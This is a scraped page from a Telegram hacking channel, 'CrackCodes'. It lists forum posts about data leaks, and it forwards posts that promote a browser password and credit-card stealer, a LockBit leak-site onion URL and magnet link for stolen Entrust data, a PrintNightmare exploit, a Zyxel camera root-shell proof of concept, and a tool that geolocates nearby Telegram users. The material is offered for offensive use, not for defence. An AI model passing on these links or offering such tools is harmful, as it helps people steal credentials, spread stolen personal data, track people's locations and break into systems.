CrackCodes 🇮🇳
8.16K subscribers
1.26K photos
250 videos
677 files
3.39K links
Official website: https://crackcodes.in

Tech_hack material : https://system32.ink
https://system32.in

Admins: @MynK0x00
https://clavin.org/
@MCracker2002

Disscussion Group : @Indianshunters

Be Secure~
जय श्री राम
Download Telegram
Ask Your Cyber Security / Hacking , Programming And Any Tech Related Question And Get Your Anwsers In A day

On :- https://hackbyte.org
Updates On Hackbyte Forum:-

1. paykart.ae Leak
2. NFCGate - an Android application meant to capture, analyze, or modify NFC traffic
3. iuristec.es leak
4. grupomerenson Leak
5. Donut File Leaks
6. erdogan_offshore_leak
7. H. Municipality of Metepec Mexico Goverment Leak
8. VB-COVIDVAC Vaccine Leak Documents
9. Pitraix Botnet – Modern P2P Self-Modifying Botnet Cross-Platform Over TOR
10. “Useless” path traversals in Zyxel admin interface (CVE-2022-2030)
11. Patch bypass for [CVE-2020-6369] Hard-coded Credentials in CA Introscope Enterprise Manager
12. CVE-2022-22715 PoC: Windows Dirty Pipe
13. HTTP header Blind SQL injection Example
14. [CVE-2020-2733] Technical overview and PoC of bypassing admin authentication of JD Edwards EnterpriseOne
15. bomber – a vulnerability scanner for SBOMs
16. CVE-2022-22715
17. 2022-LPE-UAF
18. Paracosme – Remote Code Execution in ICONICS Genesis64.
19. XSS vulnerability in Artica Proxy 4.30.0.
20. Internal Hostname Disclosure Vulnerability
21. CVE-2021-36260

👉🏻👉🏻All Updates On :- https://bit.ly/3yRyah3 👈🏻👈🏻
Forwarded from 卩ro 爪Cracker
Browser Password Stealer [Source Code]

This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers. Supports chromium 80 and above.

Modules Required

To install all the required modules use the following code:

py -m pip install -r requirements.txt

or

pip3 install -r requirements.txt

Supported browsers

Chrome
Brave
Edge (Chromium)

This tools are GUI supported

https://github.com/henry-richard7/Browser-password-stealer
Forwarded from 卩ro 爪Cracker
Entrust DataCard Leak

http://lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd.onion/entrust.com/entrust-datacard/

magnet:?xt=urn:btih:d19daf6e690d5374b17d869c56239ab958f0ef04&dn=entrust.com&tr=udp://tracker.openbittorrent.com:80&tr=udp://tracker.opentrackr.org:1337/announce
Forwarded from 卩ro 爪Cracker
​​PrintNightmare (CVE-2021-34527)

This version of the PrintNightmare exploit is heavily based on the code created by Cube0x0, with the following features:

▫️ Ability to target multiple hosts.
▫️ Built-in SMB server for payload delivery, removing the need for open file shares.
▫️ Exploit includes both MS-RPRN & MS-PAR protocols (define in CMD args).
▫️ Implements @gentilkiwi's UNC bypass technique.

https://github.com/m8sec/CVE-2021-34527

Exploiting PrintNightmare (CVE-2021–34527)
https://infosecwriteups.com/exploiting-printnightmare-cve-2021-34527-10c6e0f5b83f

#cve
Forwarded from 卩ro 爪Cracker
​​Geogramint

#OSINT Geolocalization tool for Telegram

Geogramint is an OSINT tool that uses Telegram's API to find nearby users and groups. Inspired by Tejado's Telegram Nearby Map, which is no longer maintained, it aims to provide a more user-friendly alternative.

Geogramint only finds Telegram users and groups which have activated the nearby feature. Per default it is deactivated.

The tool is fully supported on Windows and partially supported on Mac OS and Linux distributions.

https://github.com/Alb-310/Geogramint
zyxel ipc camera pwn

This is a minimal proof of concept to remotely open a root shell on a Zyxel IP enabled camera. Known vulnerable models are:

▫️ Zyxel IPC-3605N
▫️ Zyxel IPC-4605N

https://github.com/hydrogen18/zyxel_ipc_camera_pwn